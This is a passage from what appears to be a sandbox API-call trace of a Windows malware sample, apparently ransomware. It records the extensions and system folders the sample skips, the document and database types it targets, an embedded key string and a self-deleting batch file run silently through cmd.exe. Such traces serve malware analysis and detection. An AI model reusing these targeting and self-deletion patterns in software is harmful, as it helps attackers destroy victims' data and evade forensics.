cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0108.516] GetCurrentThreadId () returned 0xcb8 [0108.516] GetCurrentThreadId () returned 0xcb8 [0108.516] GetCurrentThreadId () returned 0xcb8 [0108.516] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0108.516] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0108.516] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0108.516] LockResource (hResData=0x516f58) returned 0x516f58 [0108.516] FreeResource (hResData=0x516f58) returned 0 [0108.516] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.517] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.517] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.517] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.517] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.517] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.517] FreeResource (hResData=0x50d64c) returned 0 [0108.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.517] GetCurrentThreadId () returned 0xcb8 [0108.517] GetCurrentThreadId () returned 0xcb8 [0108.517] GetCurrentThreadId () returned 0xcb8 [0108.517] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0108.517] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x1372ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0108.517] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0108.517] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0108.517] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xcbc) returned 0xb8 [0108.605] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0108.605] ResumeThread (hThread=0xb8) returned 0x1 [0108.605] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0108.819] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.819] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0108.819] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0108.819] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0108.819] LockResource (hResData=0x5187d4) returned 0x5187d4 [0108.819] FreeResource (hResData=0x5187d4) returned 0 [0108.819] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.819] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.819] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.819] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.819] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.819] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x140df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.819] FreeResource (hResData=0x50d64c) returned 0 [0108.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1415124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.820] GetCurrentThreadId () returned 0xcb8 [0108.820] GetCurrentThreadId () returned 0xcb8 [0108.820] GetCurrentThreadId () returned 0xcb8 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x13a012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0108.820] GetTickCount () returned 0x260b5 [0108.820] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=16560891659) returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="8畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="N畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="k畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="h畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="0畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="c畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="v畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="7畔﮴\x12\x1c翻") returned 1 [0108.820] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0108.820] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0108.820] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", lpszShortPath=0x13ac65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe") returned 0x30 [0108.820] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0108.820] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0108.820] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\8nkh0cv7.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0108.821] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0108.821] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0108.821] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x138fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0108.821] WriteFile (in: hFile=0xe8, lpBuffer=0x138fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x138fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0108.822] CloseHandle (hObject=0xe8) returned 1 [0108.823] GetCurrentThreadId () returned 0xcb8 [0108.823] GetCurrentThreadId () returned 0xcb8 [0108.823] GetCurrentThreadId () returned 0xcb8 [0108.823] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xccc, dwThreadId=0xcd0)) returned 1 [0108.832] CloseHandle (hObject=0xec) returned 1 [0108.832] CloseHandle (hObject=0xe8) returned 1 [0108.832] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 